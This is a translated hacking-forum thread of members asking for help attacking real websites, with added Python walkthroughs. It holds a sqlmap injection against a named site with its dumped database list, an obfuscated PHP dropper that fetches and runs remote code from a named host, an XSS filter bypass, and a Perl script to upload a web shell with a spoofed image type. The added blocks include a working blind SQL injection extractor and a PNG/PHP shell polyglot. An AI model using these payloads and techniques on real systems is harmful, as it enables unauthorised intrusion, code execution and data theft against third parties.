Your questions about vulnerabilities.

Discussion in 'Vulnerabilities' started by +, 27 Apr 2015.

  1. lukeone

    lukeone Member

    Joined:
    7 May 2017
    Messages:
    6
    Likes Received:
    17
    Reputations:
    1
    Code:
    python sqlmap.py -u "http://www.mscnano.eu/news.php?id=" --random-agent --hex --threads 1 --dbs --batch --dbms=mysql --technique=U --level 5 --risk 3 --tamper=space2comment,unmagicquotes,escapequotes,versionedkeywords
    
    ---
    Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178627871,0x775a5551695146647647515859656e61626e6367654643487767764f4e56695a726557454457534a,0x71626b6271),NULL#
    ---

    available databases [64]:
    [*] #mysql50#mysql.old.copia
    [*] 2dspm
    [*] 3s19
    [*] bondslam
    [*] cc
    [*] cees
    [*] cen2018
    [*] computing_resources
    [*] daqm
    [*] dipc
    [*] dipc-courses
    [*] dipc10
    [*] dynapeutics
    [*] e2epol
    [*] eezz18
    [*] etsf
    [*] iegr
    [*] ii
    [*] inelastica
    [*] information_schema
    [*] interfaces2014
    [*] lankor_topa14
    [*] leskovsky
    [*] limage2018
    [*] magnon
    [*] modsurf
    [*] mysql
    [*] n2d
    [*] nanoqi
    [*] nanoqi16
    [*] nanoqi17
    [*] ngsces2018
    [*] oss
    [*] oss18
    [*] pecas
    [*] pecas2019
    [*] pedro
    [*] phpmyadmin
    [*] polymorphs
    [*] prueba
    [*] qdp2018
    [*] quantumchemphys
    [*] quantumdev
    [*] sabat2018
    [*] scom16
    [*] siqew2019
    [*] sos2
    [*] sos22
    [*] test
    [*] theobio17
    [*] tms17
    [*] tmspin
    [*] topadipc
    [*] topadipc2012
    [*] topadipc2014
    [*] topadipc2015
    [*] topadipc2017
    [*] topadipc2018
    [*] topadipcOLD
    [*] topostates
    [*] totalenergy2020
    [*] tstutorial
    [*] webcc
    [*] wikidb

    The whole point is that there is some filter there that drops the connection on "suspicious requests"; sqlmap's tampers still get through anyway)
     
    Pirnazar and Sola666 like this.
  2. jakonda1001

    jakonda1001 New Member

    Joined:
    17 Mar 2016
    Messages:
    181
    Likes Received:
    4
    Reputations:
    0
    How do you upload through this?
    Code:
    <?php
    @ini_set('display_errors', '0');
    error_reporting(0);
    if (!$npDcheckClassBgp) {
        // Function names are assembled at runtime to dodge static scanners:
        // '_shaesx_' -> 'basesx_' -> 'basesx_decode' -> 'base64_decode'
        $ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode';
        $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd';
        $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee);
        $algo = 'default';   // name of the temporary file: ".default"
        $pass = "Zgc5c4MXrLUocQYT5ZtHJf/cM1fWdrpdmmSLH6uToRkH";  // encrypted URL of the second stage
        // Downloader: file_get_contents() when URL wrappers are allowed, otherwise cURL
        if (ini_get('allow_url_fopen')) {
            function get_data_ya($url) {
                $data = file_get_contents($url);
                return $data;
            }
        }
        else {
            function get_data_ya($url) {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
                $data = curl_exec($ch);
                curl_close($ch);
                return $data;
            }
        }
        // XOR stream cipher: the keystream is sha1(key . keystream_so_far . 'wp_frmfunct'),
        // 2 bytes per round for short inputs, 8 bytes for inputs longer than 100 bytes
        function wp_cd($fd, $fa="")
        {
            $fe = "wp_frmfunct";
            $len = strlen($fd);
            $ff = '';
            $n = $len>100 ? 8 : 2;
            while( strlen($ff)<$len )
            {
                $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
            }
            return $fd^$ff;
        }
        // get_data_ya(wp_cd(base64_decode($pass), 'wp_function')): decrypt the URL, then fetch it
        $reqw = $ay($ao($oa("$pass"), 'wp_function'));
        // the PHP to execute is whatever sits between "gogo" and "enen" in the response
        preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
        // pick the first writable directory (one or two levels down, then the current one)
        $dirs = glob("*", GLOB_ONLYDIR);
        foreach ($dirs as $dira) {
            if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; }
            $subdirs = glob("$dira/*", GLOB_ONLYDIR);
            foreach ($subdirs as $subdira) {
                if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; }
            }
        }
        if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
        // write the fetched code into ".default", include it, then remove the trace
        fwrite($hdl, "<?php\n$mtchs[1]\n?>");
        fclose($hdl);
        include("{$eb}.$algo");
        unlink("{$eb}.$algo");
        $npDcheckClassBgp = 'aue';
    }
     
  3. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    539
    Likes Received:
    1,007
    Reputations:
    333
    It fetches, saves and includes this script: http://linksferma.com/lnk/inj.php. What is going on is clearer there.
     
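Added example, not code from either post above: a Python port of the string tricks and of the wp_cd() XOR stream in the dropper, so the URL it pulls can be recovered without executing the PHP. Only the values visible in the posted code are used ($pass, the 'wp_function' key, the 'wp_frmfunct' salt, the gogo...enen regex); the sample "remote response" at the bottom is constructed.

```python
# Added example: static recovery of what the PHP dropper above fetches and runs.
import base64
import hashlib
import re

PASS = "Zgc5c4MXrLUocQYT5ZtHJf/cM1fWdrpdmmSLH6uToRkH"  # $pass from the posted code


def resolve_function_names():
    """Rebuild the names the dropper assembles with str_replace() at runtime."""
    ea = "_shaesx_".replace("_sha", "bas")        # 'basesx_'
    oa = (ea + "decode").replace("sx", "64")       # 'base64_decode'
    return {"oa": oa, "ao": "wp_cd", "ay": "get_data_ya"}


def wp_cd(fd: bytes, fa: bytes = b"") -> bytes:
    """Port of wp_cd(): keystream = concatenated sha1(key . stream_so_far . 'wp_frmfunct') prefixes.

    The keystream never depends on the plaintext, so the same call encrypts and decrypts.
    """
    fe = b"wp_frmfunct"
    n = 8 if len(fd) > 100 else 2
    ff = b""
    while len(ff) < len(fd):
        ff += hashlib.sha1(fa + ff + fe).digest()[:n]
    # PHP's string XOR truncates to the shorter operand; zip() does the same
    return bytes(a ^ b for a, b in zip(fd, ff))


def decode_c2_url(pass_b64: str = PASS) -> str:
    """$reqw = get_data_ya(wp_cd(base64_decode($pass), 'wp_function')): the argument is the URL."""
    return wp_cd(base64.b64decode(pass_b64), b"wp_function").decode("latin-1")


def extract_payload(fetched: str):
    """preg_match('#gogo(.*)enen#is', ...): the PHP that gets written to '.default' and include()d."""
    m = re.search(r"gogo(.*)enen", fetched, re.S | re.I)
    return m.group(1) if m else None


if __name__ == "__main__":
    print(resolve_function_names())
    print("second stage URL:", decode_c2_url())
    # constructed stand-in for what the remote script could return
    sample = "<!-- noise -->gogo echo 'stage two'; enen<!-- more noise -->"
    print("code that would be include()d:", extract_payload(sample))
```

The decoded string is 33 bytes, which is exactly the length of the URL crlf names above; the base64 value holds no other data, so the dropper's only secret is that address.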
  4. TPAXXTOP

    TPAXXTOP New Member

    Joined:
    12 Oct 2016
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    Friends, help me out: there is a site with a GET parameter; I added ' at the end and got the error below, so I think there is a vulnerability
    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near and status=1' at line 1
    1064
    but when I try to exploit it with sqlmap it gives the error unable to connect to the target URL
    I tried putting a proxy in, same trouble
     
  5. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,312
    Likes Received:
    10,188
    Reputations:
    115
    TPAXXTOP likes this.
  6. TPAXXTOP

    TPAXXTOP New Member

    Joined:
    12 Oct 2016
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
  7. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    227
    Likes Received:
    386
    Reputations:
    100
    Try working it out by hand first. Then, once you have the vulnerability worked out in your hands, use the corresponding tampers.
     
    ms13 and TPAXXTOP like this.
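Worked example added here (not from any post in the thread): exploiting the error above by hand, the way joelblack suggests, before reaching for sqlmap. The message "near ... and status=1' at line 1" says the parameter sits inside a single-quoted string and is followed by `and status=1`, so a payload such as `1' and '1'='1` repairs the syntax and gives a boolean oracle. The target is modelled with an in-memory SQLite table so the script runs offline; on MariaDB replace unicode() with ascii(), everything else is plain SQL. The table, column and user names are made up.

```python
# Added example: manual error-based confirmation and boolean-based extraction
# against a model of "WHERE id='<param>' and status=1".
import sqlite3

db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE news(id TEXT, title TEXT, status INTEGER);
    INSERT INTO news VALUES ('1', 'Welcome', 1), ('2', 'Hidden', 0);
    CREATE TABLE users(login TEXT, pass TEXT);
    INSERT INTO users VALUES ('admin', 's3cr3t');
""")


def vulnerable_page(param: str) -> str:
    """Stand-in for the target: the GET parameter is concatenated into SQL unescaped."""
    sql = f"SELECT title FROM news WHERE id='{param}' and status=1"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.OperationalError as e:
        return f"SQL error: {e}"            # the real target leaks a 1064 error here
    return row[0] if row else "not found"


def confirm_injection(base_id: str = "1") -> bool:
    """Step 1: a lone quote breaks the query, a balanced one restores the normal page."""
    broken = vulnerable_page(base_id + "'").startswith("SQL error")
    repaired = vulnerable_page(base_id + "' and '1'='1") == vulnerable_page(base_id)
    return broken and repaired


def oracle(base_id: str, condition: str) -> bool:
    """Step 2: boolean oracle - the page equals the normal one only when the condition is TRUE."""
    return vulnerable_page(f"{base_id}' and ({condition}) and '1'='1") == vulnerable_page(base_id)


def extract(base_id: str, expr: str, max_len: int = 32) -> str:
    """Step 3: read the value of an SQL expression one character at a time through the oracle.

    unicode(substr(x, pos, 1)) is SQLite; MariaDB uses ascii(substr(x, pos, 1)).
    """
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(base_id, f"length(({expr}))>={pos}"):
            break                               # past the end of the value
        lo, hi = 0, 127                         # binary search over the ASCII code
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(base_id, f"unicode(substr(({expr}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    print("injectable:", confirm_injection())
    print("admin password:", extract("1", "select pass from users where login='admin'"))
```

Each character costs about eight requests with the binary search, which is what sqlmap's `--technique=B` automates once you hand it the working prefix/suffix via `--prefix "'"` and `--suffix "and '1'='1"`.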
  8. TPAXXTOP

    TPAXXTOP New Member

    Joined:
    12 Oct 2016
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    The thing is, I don't know how to work it by hand) tell me how to do it properly, or at least point me to some manual, please)
     
  9. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,312
    Likes Received:
    10,188
    Reputations:
    115
    TPAXXTOP likes this.
  10. ilia455

    ilia455 New Member

    Joined:
    7 Sep 2015
    Messages:
    6
    Likes Received:
    1
    Reputations:
    2
    google css injection
     
  11. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    299
    Likes Received:
    142
    Reputations:
    2
    start Tor and put --tor in sqlmap, or use a proxy
     
  12. matthhy

    matthhy New Member

    Joined:
    16 Feb 2017
    Messages:
    55
    Likes Received:
    0
    Reputations:
    0
  13. c4n3k

    c4n3k New Member

    Joined:
    29 Oct 2018
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
  14. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
    Send it over, I'll take a look
     
    matthhy likes this.
  15. matthhy

    matthhy New Member

    Joined:
    16 Feb 2017
    Messages:
    55
    Likes Received:
    0
    Reputations:
    0
    Guys, can anyone help?
    There is a link, found with NetSparker, that throws an error. Can this error be exploited somehow? (the address is of the form https://site.su/fullnews-14)
     
  16. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
    Hi, are there any bypasses for a filter on ( ) " ?
    Code:
    <a href="javascript:alert1">XSS</a>
     
  17. BigBear

    BigBear Escrow Service
    Staff Member Guarantor - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,766
    Likes Received:
    836
    Reputations:
    857
    onerror=alert;throw 1;

    This works in every browser apart from Firefox*; Safari and IE will just call the function with the argument, but Chrome and Opera add "Uncaught" to the argument. This is no big deal though, since we can just modify it slightly and use a different object as the argument, such as a string.


    onerror=eval;throw'=alert\x281\x29';
     
  18. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
    There is a site where you can book seats. If I make a bot that books all the seats and causes financial losses, am I breaking the law?
     
  19. BigBear

    BigBear Escrow Service
    Staff Member Guarantor - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,766
    Likes Received:
    836
    Reputations:
    857
    Have you ever heard of lost profit?
     
    cat1vo likes this.
  20. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    150
    Likes Received:
    10
    Reputations:
    0
    I have a Perl script with which I want to upload a web shell to a site with a spoofed MIME type:

    Code:
    #!/usr/bin/perl
    use strict;
    use warnings;
    use LWP::UserAgent;
    use HTTP::Request::Common qw(POST);

    my $url = 'VULNERABLE SITE';   # placeholder from the post
    my $ua  = LWP::UserAgent->new;

    my $res = $ua->request(
        POST $url,
        Content_Type      => 'form-data',   # LWP builds the multipart body and boundary itself
        'X-Unity-Version' => '5.6.5f1',     # extra request header goes here, not inside Content_Type
        Content => [
            # file part: [ local path, filename sent to the server, part headers ]
            userfile => [ 'C:/jpeg.jpg.php', 'jpeg.jpg.php', 'Content-Type' => 'image/png' ],
            # the other form fields are separate parts, not headers of the file part
            iAuid    => '6cb4dbkgvato004v6i4vugq6q2',
            sSign    => '5msfdbv9gsct64cbo9e3hbc3p0',
            content  => '',
        ],
    );

    print $res->as_string;

    But I cannot put the request together in a way that makes it accept the file. I keep hitting error 1000 (which in the script means a parameter was passed incorrectly).
    In Burp itself I already get 1002 (wrong file type).
    Tell me how to put the request together correctly in Perl so that the site accepts the file?

    Code:
    <?php
    
    include_once dirname(__FILE__) . '/configuration.php';
    include_once dirname(__FILE__) . '/includes/share/share.class.php';
    
    $oConfig = new JConfig();
    $Image = isset($_POST['content']) ? $_POST['content'] : null;
    if (is_null($Image)) {
        $Image = isset($_FILES['content']) ? $_FILES['content'] : null;
    }
    $Preview = isset($_POST['preview']) ? $_POST['preview'] : '';
    if (empty($Preview)) {
        $Preview = isset($_FILES['preview']) ? $_FILES['preview'] : '';
    }
    $iAuid = isset($_POST['auid']) ? intval($_POST['auid']) : intval($_GET['auid']);
    $sShareType = isset($_POST['shareType']) ? $_POST['shareType'] : '';
    $sSign = isset($_POST['sign']) ? $_POST['sign'] : $_GET['sign'];
    $sBaseUrl = 'http://' . $_SERVER['HTTP_HOST'] . '/';
    if ($Image && $iAuid && $sSign) {
        $sScriptUri = empty($_SERVER['SCRIPT_URI'])
            ? 'http' . (empty($_SERVER['HTTPS']) ? '' : 's') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']
            : $_SERVER['SCRIPT_URI'];
        if (md5($iAuid . $sScriptUri) == $sSign) {
            $oSharer = new GameShare($iAuid, $Image, $Preview, $sShareType, $sSign);
            $oSharer->setConfig($oConfig);
            $sShareUrl = null;
            $iResult = $oSharer->doShare($sShareUrl);
            if ($iResult == 1) {
                print $sBaseUrl . $sShareUrl;
            } else {
                print $sBaseUrl . '?ec=' . $iResult;
            }
        } else {
            error_log('Sign is incorrect => iAuid:' . $iAuid . ' sSign:' . $sSign . ' sScriptUri:' . $sScriptUri);
            print $sBaseUrl . '?ec=1001'; // signature does not match
        }
    } else {
        error_log('Some parameters are not set => iAuid:' . $iAuid . ' sSign:' . $sSign . ' Image:' . ($Image ? '+' : '-'));
        print $sBaseUrl . '?ec=1000'; // required parameters missing
    }
    
    Code:
    <?php
    
    include_once dirname(__FILE__).'/../mysql/mysql.class.php';
    
    class GameShare
    {
        private $auid;
        private $shareType;
        private $fileInfo;
        private $previewInfo;
        private $oConfig;
        private $sign;
        private $dbInfo = array();
        private $allowedMime = array(
            'image/png',
            'image/gif',
            'image/jpeg',
        );
    
        /**
         * @param $auid
         * @param $fileInfo
         * @param string $previewInfo
         * @param string $shareType
         * @param string $sign
         */
        public function __construct($auid, $fileInfo = null, $previewInfo = '', $shareType = '', $sign = '')
        {
            $this->auid = $auid;
            $this->fileInfo = $fileInfo;
            $this->previewInfo = $previewInfo;
            $this->shareType = $shareType;
            $this->sign = $sign;
        }
    
        /**
         * @param $sFolder
         */
        private function createFolder($sFolder)
        {
            if (!file_exists($sFolder)) {
                mkdir($sFolder, 0777);
            }
        }
    
        /**
         * @return null|string
         */
        private function createUserFolder()
        {
            if ($this->auid) {
                $shareFolder = dirname(__FILE__) . '/../../' . $this->oConfig->shareFolderName;
                $this->createFolder($shareFolder);
                $shareFolder10000 = $shareFolder . (intval($this->auid/10000)) . '/';
                $this->createFolder($shareFolder10000);
                $shareFolder1000 = $shareFolder10000 . (intval($this->auid/1000)) . '/';
                $this->createFolder($shareFolder1000);
                $shareFolder100 = $shareFolder1000 . (intval($this->auid/100)) . '/';
                $this->createFolder($shareFolder100);
                $shareFolder1 = $shareFolder100 . (intval($this->auid)) . '/';
                $this->createFolder($shareFolder1);
                return $shareFolder1;
            }
    
            return null;
        }
    
        /**
         * @return string
         */
        public function getUserFolder()
        {
            return $this->oConfig->shareFolderName . intval($this->auid/10000) . '/' . intval($this->auid/1000)
                . '/' . intval($this->auid/100) . '/' . intval($this->auid) . '/';
        }
    
        /**
         * @param $oConfig
         */
        public function setConfig($oConfig)
        {
            $this->oConfig = $oConfig;
            $this->dbInfo = array(
                'mysqlHost' => $this->oConfig->host,
                'mysqlUser' => $this->oConfig->user,
                'mysqlPassword' => $this->oConfig->password,
                'mysqlDB' => $this->oConfig->db,
            );
        }
    
        /**
         * @param $auid
         */
        public function setAuid($auid)
        {
            $this->auid = $auid;
        }
    
        /**
         * @param $sResult
         * @return int
         */
        public function doShare(& $sResult)
        {
            $sUserFolder = $this->createUserFolder();
            if (!$sUserFolder) return 1003; // error while uploading the file to the server
    
            $time = time();
    
            // Upload the main image
            $imageInfo = getimagesize($this->fileInfo['tmp_name']);
            if (empty($imageInfo[0]) || empty($imageInfo[1])) return 1002; // wrong file type
            if (!in_array($imageInfo['mime'], $this->allowedMime)) return 1002; // wrong file type
            $aExt = explode('/', $imageInfo['mime']);
            $fileName = $time . '.' . $aExt[1];
            $sDest = $sUserFolder . $fileName;
            move_uploaded_file($this->fileInfo['tmp_name'], $sDest);
    
            // Upload the preview (if there is one)
            $previewFileName = '';
            if ($this->previewInfo) {
                $imageInfo = getimagesize($this->previewInfo['tmp_name']);
                if (empty($imageInfo[0]) || empty($imageInfo[1])) return 1002; // wrong file type
                if (!in_array($imageInfo['mime'], $this->allowedMime)) return 1002; // wrong file type
                $aExt = explode('/', $imageInfo['mime']);
                $previewFileName = $time . '-thumb.' . $aExt[1];
                $sDest = $sUserFolder . $previewFileName;
                move_uploaded_file($this->previewInfo['tmp_name'], $sDest);
            }
    
            // Save, and build the response if OK
            $iResult = $this->save($fileName, $previewFileName);
            if (!$iResult) return 1004;
            $sResult = '?share='.$iResult;
    
            return 1;
        }
    
        /**
         * @param $fileName
         * @param string $previewFileName
         * @return mixed
         */
        public function save($fileName, $previewFileName = '')
        {
            $oSQL = mysqlConnect::getInstance($this->dbInfo);
            $oSQL->query('INSERT INTO tbl_share_info (auid, filename, preview_filename, sharedate) VALUES ('
                . intval($this->auid) . ', "' . $fileName . '", "' . $previewFileName . '", NOW())');
    
            return $oSQL->insert_id;
        }
    
        /**
         * @param $id
         * @return mixed
         */
        public function get($id)
        {
            $oSQL = mysqlConnect::getInstance($this->dbInfo);
            $oResult = $oSQL->query('SELECT * FROM tbl_share_info WHERE id=' . intval($id));
    
            return $oResult->fetch_array();
        }
    
        /**
         * @param $id
         * @return int
         */
        public function getPrev($id)
        {
            $oSQL = mysqlConnect::getInstance($this->dbInfo);
            $oResult = $oSQL->query('SELECT MAX(id) as prev FROM tbl_share_info WHERE id<' . intval($id));
            $aRow = $oResult->fetch_array();
    
            return intval($aRow['prev']);
        }
    
        /**
         * @param $id
         * @return int
         */
        public function getNext($id)
        {
            $oSQL = mysqlConnect::getInstance($this->dbInfo);
            $oResult = $oSQL->query('SELECT MIN(id) as next FROM tbl_share_info WHERE id>' . intval($id));
            $aRow = $oResult->fetch_array();
    
            return intval($aRow['next']);
        }
    
        /**
         * @param $auid
         * @return mixed
         */
        public function checkUserScreens($auid)
        {
            $oSQL = mysqlConnect::getInstance($this->dbInfo);
            $oResult = $oSQL->query('SELECT COUNT(*) AS iCnt FROM tbl_share_info WHERE auid=' . intval($auid));
            $aRow = $oResult->fetch_assoc();
    
            return $aRow['iCnt'];
        }
    
        /**
         * @param $auid
         * @return array
         */
        public function getUserScreens($auid)
        {
            $oSQL = mysqlConnect::getInstance($this->dbInfo);
            $oResult = $oSQL->query('SELECT * FROM tbl_share_info WHERE auid=' . intval($auid) . ' ORDER BY sharedate DESC');
            $aResult = array();
            while ($aRow = $oResult->fetch_assoc()) {
                $aResult[] = $aRow;
            }
    
            return $aResult;
        }
    }
    
     
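Added example, not the poster's script and not the target's code: a Python model of the checks visible in the two PHP files above, to establish what the endpoint will and will not accept before fighting with the Perl request. Two things follow directly from that source. The index script reads the fields content, auid and sign (not userfile, iAuid and sSign), with sign = md5(auid . script URI), which is why the 1000 "required parameters missing" branch fires. And doShare() derives the stored extension from the MIME type that getimagesize() sniffs from the bytes, ignoring both the client Content-Type and the upload name, so a PHP file called jpeg.jpg.php is rejected with 1002 while a valid PNG with PHP appended is accepted but saved as <time>.png. The getimagesize() stand-in below only recognises the PNG, GIF and JPEG signatures; the sample bytes are constructed.

```python
# Added example: model of GameShare::doShare() and the sign check from the index script.
import hashlib
import struct

ALLOWED_MIME = ("image/png", "image/gif", "image/jpeg")   # $allowedMime in the class


def getimagesize(data: bytes):
    """Minimal stand-in for PHP getimagesize(): (width, height, mime) or None.

    Like PHP it looks at magic bytes only, never at the filename or the
    Content-Type the client sent with the part.
    """
    if data[:8] == b"\x89PNG\r\n\x1a\n" and data[12:16] == b"IHDR":
        w, h = struct.unpack(">II", data[16:24])
        return w, h, "image/png"
    if data[:6] in (b"GIF87a", b"GIF89a"):
        w, h = struct.unpack("<HH", data[6:10])
        return w, h, "image/gif"
    if data[:2] == b"\xff\xd8":        # JPEG SOI; real size parsing omitted, 1x1 assumed
        return 1, 1, "image/jpeg"
    return None


def do_share(upload: bytes, now: int):
    """Port of the accept/reject path: returns (result code, stored file name)."""
    info = getimagesize(upload)
    if info is None or not info[0] or not info[1]:
        return 1002, None                           # wrong file type
    _w, _h, mime = info
    if mime not in ALLOWED_MIME:
        return 1002, None
    ext = mime.split("/")[1]                        # extension comes from the sniffed MIME
    return 1, f"{now}.{ext}"                        # $time . '.' . $aExt[1]


def make_sign(auid: int, script_uri: str) -> str:
    """Index script: md5($iAuid . $sScriptUri) must equal the 'sign' field."""
    return hashlib.md5(f"{auid}{script_uri}".encode()).hexdigest()


# constructed inputs: a 1x1 PNG header (IHDR only, enough for the sniffer), PHP-only
# content, and a PNG/PHP polyglot such as the one the poster is trying to upload
TINY_PNG = (b"\x89PNG\r\n\x1a\n" + struct.pack(">I", 13) + b"IHDR"
            + struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0))
PHP_ONLY = b"<?php system($_GET['c']); ?>"
POLYGLOT = TINY_PNG + b"\n" + PHP_ONLY

if __name__ == "__main__":
    for label, blob in (("jpeg.jpg.php with PHP only", PHP_ONLY), ("PNG + PHP polyglot", POLYGLOT)):
        print(label, "->", do_share(blob, 1700000000))
    print("sign for auid 6:", make_sign(6, "http://example.invalid/share.php"))  # hypothetical URI
```

Whatever the Perl sends, the file lands with a .png/.gif/.jpeg name chosen by the server, so the polyglot only pays off if something else on the host executes images by content (an include of the stored path, a misconfigured handler); this endpoint alone does not give a shell.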